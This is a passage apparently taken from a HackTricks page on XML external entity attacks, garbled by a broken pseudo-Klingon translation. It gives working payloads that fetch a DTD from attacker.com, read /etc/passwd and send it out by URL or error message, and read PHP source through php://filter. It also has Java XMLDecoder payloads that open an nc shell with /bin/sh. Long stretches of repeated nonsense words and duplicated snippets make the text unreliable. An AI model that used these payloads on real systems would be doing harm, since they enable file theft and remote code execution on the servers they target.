'e' vItlhutlh, vaj jatlhpu' 'e' vItlhutlh, vaj jatlhpu' 'e' vItlhutlh, vaj jatlhpu' 'e' vItlhutlh, vaj jatlhpu' 'e' vItlhutlh, vaj jatlhpu' 'e' vItlhutlh, vaj jatlhpu' 'e' vItlhutlh, vaj jatlhpu' 'e' vItlhutlh, vaj jatlhpu' 'e' vItlhutlh, vaj jatlhpu' 'e' vItlhutlh, vaj jatlhpu' 'e' vItlhutlh, vaj jatlhpu' 'e' vItlhutlh, vaj jatlhpu' 'e' vItlhutlh, vaj jatlhpu' 'e' vItlhutlh, vaj jatlhpu' 'e' vItlhutlh, vaj jatlhpu' 'e' vItlhutlh, vaj jatlhpu' 'e' vItlhutlh, vaj jatlhpu' 'e' vItlhutlh, vaj jatlhpu' 'e' vItlhutlh, vaj jatlhpu' 'e' vItlhutlh, vaj jatlhpu' 'e' vItlhutlh, vaj jatlhpu' 'e' vItlhutlh, vaj jatlhpu' 'e' vItlhutlh, vaj jatlhpu' 'e' vItlhutlh, vaj jatlhpu' 'e' vItlhutlh, vaj jatlhpu' 'e' vItlhutlh, vaj jatlhpu' 'e' vItlhutlh, vaj jatlhpu' 'e' vItlhutlh, vaj jatlhpu' 'e' vItlhutlh, vaj jatlhpu' 'e' vItlhutlh, vaj jat
```json
{"status":500,"error":"Internal Server Error","message":"Error systemId: http://redacted.burpcollaborator.net/?xxe_test; The markup declarations contained or pointed to by the document type declaration must be well-formed."}
```
**QawHaq Data Exfiltration**

To exfiltrate data, a modified request is sent:
```
------WebKitFormBoundaryqBdAsEtYaBjTArl3
Content-Disposition: form-data; name="file"; filename="xxe.xliff"
Content-Type: application/x-xliff+xml

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE XXE [
<!ENTITY % remote SYSTEM "http://attacker.com/evil.dtd"> %remote; ]>
<xliff srcLang="en" trgLang="ms-MY" version="2.0"></xliff>
------WebKitFormBoundaryqBdAsEtYaBjTArl3--
```
**Translation:**

**This approach reveals that the User Agent indicates the use of Java 1.8. A noted limitation with this version of Java is the inability to retrieve files containing a newline character, such as /etc/passwd, using the Out of Band technique.**

**Error-Based Data Exfiltration**
**To overcome this limitation, an Error-Based approach is employed. The DTD file is structured as follows to trigger an error that includes data from a target file:**

**Translation:**

**qawHaqDaq 'e' User Agent vItlhutlh Java 1.8 vItlhutlh. Java vItlhutlh 'e' vItlhutlh newline character, /etc/passwd, Out of Band technique vItlhutlh retrieve files containing inability.**

**Error-Based Data Exfiltration**
**vItlhutlh, Error-Based approach 'e' vItlhutlh. DTD file structured vItlhutlh error trigger data 'e' target file include:**
```xml
<!ENTITY % data SYSTEM "file:///etc/passwd">
<!ENTITY % foo "<!ENTITY &#37; xxe SYSTEM 'file:///nofile/'>">
%foo;
%xxe;
```
The server responds with an error, importantly reflecting the non-existent file, indicating that the server is attempting to access the specified file:

**Klingon Translation:**

**QapHa'logh:** 
Server vItlhutlhDaq qabDaj, vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq, vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhDaq vItlhutlhD
```javascript
{"status":500,"error":"Internal Server Error","message":"IO error.\nReason: /nofile (No such file or directory)"}
```
To include the file's content in the error message, the DTD file is adjusted:

```
<!ENTITY % file SYSTEM "file:///etc/passwd">
<!ENTITY % eval "<!ENTITY &#x25; exfiltrate SYSTEM 'http://attacker.com/?data=%file;'>">
%eval;
%exfiltrate;
```

This technique allows an attacker to read the contents of the `/etc/passwd` file and exfiltrate it to their own server.
```xml
<!ENTITY % data SYSTEM "file:///etc/passwd">
<!ENTITY % foo "<!ENTITY &#37; xxe SYSTEM 'file:///nofile/%data;'>">
%foo;
%xxe;
```
**ghItlh** - **XEE**

XML **RSS** format **XML** **XXE** vulnerability **exploit**.

### **Ping back**

**HTTP** **request** **attackers** **server** **Simple**.
```xml
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE title [ <!ELEMENT title ANY >
<!ENTITY xxe SYSTEM "http://<AttackIP>/rssXXE" >]>
<rss version="2.0" xmlns:atom="http://www.w3.org/2005/Atom">
<channel>
<title>XXE Test Blog</title>
<link>http://example.com/</link>
<description>XXE Test Blog</description>
<lastBuildDate>Mon, 02 Feb 2015 00:00:00 -0000</lastBuildDate>
<item>
<title>&xxe;</title>
<link>http://example.com</link>
<description>Test Post</description>
<author>author@example.com</author>
<pubDate>Mon, 02 Feb 2015 00:00:00 -0000</pubDate>
</item>
</channel>
</rss>
```
### QaD lo'wI'vam

XML External Entity (XXE) attack, 'e' vItlhutlh 'e' vItlhutlh xml file 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vItlhutlh 'e' vI
```xml
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE title [ <!ELEMENT title ANY >
<!ENTITY xxe SYSTEM "file:///etc/passwd" >]>
<rss version="2.0" xmlns:atom="http://www.w3.org/2005/Atom">
<channel>
<title>The Blog</title>
<link>http://example.com/</link>
<description>A blog about things</description>
<lastBuildDate>Mon, 03 Feb 2014 00:00:00 -0000</lastBuildDate>
<item>
<title>&xxe;</title>
<link>http://example.com</link>
<description>a post</description>
<author>author@example.com</author>
<pubDate>Mon, 03 Feb 2014 00:00:00 -0000</pubDate>
</item>
</channel>
</rss>
```
### Source code jatlh

PHP base64 filter laH

```php
<?php
$file = 'index.php';
$sourceCode = file_get_contents($file);
$encodedSourceCode = base64_encode($sourceCode);
echo $encodedSourceCode;
?>
```

### Source code jatlh

PHP base64 filter laH

```php
<?php
$file = 'index.php';
$sourceCode = file_get_contents($file);
$encodedSourceCode = base64_encode($sourceCode);
echo $encodedSourceCode;
?>
```

### Source code jatlh

PHP base64 filter laH

```php
<?php
$file = 'index.php';
$sourceCode = file_get_contents($file);
$encodedSourceCode = base64_encode($sourceCode);
echo $encodedSourceCode;
?>
```
```xml
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE title [ <!ELEMENT title ANY >
<!ENTITY xxe SYSTEM "php://filter/convert.base64-encode/resource=file:///challenge/web-serveur/ch29/index.php" >]>
<rss version="2.0" xmlns:atom="http://www.w3.org/2005/Atom">
<channel>
<title>The Blog</title>
<link>http://example.com/</link>
<description>A blog about things</description>
<lastBuildDate>Mon, 03 Feb 2014 00:00:00 -0000</lastBuildDate>
<item>
<title>&xxe;</title>
<link>http://example.com</link>
<description>a post</description>
<author>author@example.com</author>
<pubDate>Mon, 03 Feb 2014 00:00:00 -0000</pubDate>
</item>
</channel>
</rss>
```
## Java XMLDecoder XEE to RCE

XMLDecoder vItlhutlh Java class vaj XML message based objects yIlo'laHbe'. vaj application arbitrary data vItlhutlh **readObject** method call vIlo'laHbe', 'oH vItlhutlh malicious user code execution server.

### Runtime().exec() vIlo'laHbe'
```xml
<?xml version="1.0" encoding="UTF-8"?>
<java version="1.7.0_21" class="java.beans.XMLDecoder">
<object class="java.lang.Runtime" method="getRuntime">
<void method="exec">
<array class="java.lang.String" length="6">
<void index="0">
<string>/usr/bin/nc</string>
</void>
<void index="1">
<string>-l</string>
</void>
<void index="2">
<string>-p</string>
</void>
<void index="3">
<string>9999</string>
</void>
<void index="4">
<string>-e</string>
</void>
<void index="5">
<string>/bin/sh</string>
</void>
</array>
</void>
</object>
</java>
```
### ProcessBuilder

The `ProcessBuilder` class in Java is used to create operating system processes. It provides a way to execute external commands and programs from within a Java application.

#### Usage

To use `ProcessBuilder`, you first need to create an instance of the class and specify the command and arguments for the process you want to execute. You can then start the process and interact with it as needed.

Here is an example of how to use `ProcessBuilder` to execute a command:

```java
ProcessBuilder processBuilder = new ProcessBuilder("ls", "-l");
Process process = processBuilder.start();

// Read the output of the process
InputStream inputStream = process.getInputStream();
BufferedReader reader = new BufferedReader(new InputStreamReader(inputStream));
String line;
while ((line = reader.readLine()) != null) {
    System.out.println(line);
}

// Wait for the process to complete
int exitCode = process.waitFor();
System.out.println("Exit code: " + exitCode);
```

In this example, we create a `ProcessBuilder` instance with the command "ls" and the argument "-l" to list the files in the current directory. We then start the process and read its output using an `InputStream` and a `BufferedReader`. Finally, we wait for the process to complete and print its exit code.

#### Security Considerations

When using `ProcessBuilder`, it is important to be aware of security considerations. Executing external commands can be risky if not done properly. Here are some best practices to follow:

1. **Validate user input**: Always validate and sanitize any user input that is used to construct the command or its arguments. This helps prevent command injection attacks.

2. **Avoid using user input directly**: Instead of using user input directly, consider using predefined commands or a whitelist of allowed commands. This reduces the risk of executing unintended commands.

3. **Limit privileges**: Run the process with the minimum privileges necessary to perform its task. This helps mitigate the impact of any potential security vulnerabilities in the executed command.

By following these best practices, you can use `ProcessBuilder` safely and securely in your Java applications.
```xml
<?xml version="1.0" encoding="UTF-8"?>
<java version="1.7.0_21" class="java.beans.XMLDecoder">
<void class="java.lang.ProcessBuilder">
<array class="java.lang.String" length="6">
<void index="0">
<string>/usr/bin/nc</string>
</void>
<void index="1">
<string>-l</string>
</void>
<void index="2">
<string>-p</string>
</void>
<void index="3">
<string>9999</string>
</void>
<void index="4">
<string>-e</string>
</void>
<void index="5">
<string>/bin/sh</string>
</void>
</array>
<void method="start" id="process">
</void>
</void>
</java>
```
## Tools

{% embed url="https://github.com/luisfontes19/xxexploiter" %}

## References

* [https://media.blackhat.com/eu-13/briefings/Osipov/bh-eu-13-XML-data-osipov-slides.pdf](https://media.blackhat.com/eu-13/briefings/Osipov/bh-eu-13-XML-data-osipov-slides.pdf)\
* [https://web-in-security.blogspot.com/2016/03/xxe-cheat-sheet.html](https://web-in-security.blogspot.com/2016/03/xxe-cheat-sheet.html)\
* Extract info via HTTP using own external DTD: [https://ysx.me.uk/from-rss-to-xxe-feed-parsing-on-hootsuite/](https://ysx.me.uk/from-rss-to-xxe-feed-parsing-on-hootsuite/)\
* [https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/XXE%20injection](https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/XXE%20injection)\
* [https://gist.github.com/staaldraad/01415b990939494879b4](https://gist.github.com/staaldraad/01415b990939494879b4)\
* [https://medium.com/@onehackman/exploiting-xml-external-entity-xxe-injections-b0e3eac388f9](https://medium.com/@onehackman/exploiting-xml-external-entity-xxe-injections-b0e3eac388f9)\
* [https://portswigger.net/web-security/xxe](https://portswigger.net/web-security/xxe)\
* [https://gosecure.github.io/xxe-workshop/#7](https://gosecure.github.io/xxe-workshop/#7)

<details>

<summary><strong>Learn AWS hacking from zero to hero with</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>

Other ways to support HackTricks:

* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.

</details>